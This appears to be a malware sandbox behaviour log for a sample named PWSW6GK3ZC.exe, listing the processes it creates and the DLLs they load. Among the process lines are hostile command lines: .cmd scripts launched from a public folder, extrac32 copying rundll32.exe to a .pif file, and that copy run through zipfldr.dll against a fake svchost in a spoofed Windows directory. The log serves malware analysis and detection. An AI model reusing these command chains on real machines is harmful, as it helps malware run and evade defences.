Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Process created: C:\Users\Public\Libraries\fpnevlzQ.pif C:\Users\Public\Libraries\fpnevlzQ.pif
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\QzlvenpfF.cmd" "	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\\Qzlvenpf13.cmd" "	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Process created: C:\Users\Public\Libraries\fpnevlzQ.pif C:\Users\Public\Libraries\fpnevlzQ.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\ndpha.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\ndpha.pif C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Process created: C:\Users\Public\Libraries\fpnevlzQ.pif C:\Users\Public\Libraries\fpnevlzQ.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Process created: C:\Users\Public\Libraries\fpnevlzQ.pif C:\Users\Public\Libraries\fpnevlzQ.pif

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Section loaded: iertutil.dll	Jump to behavior
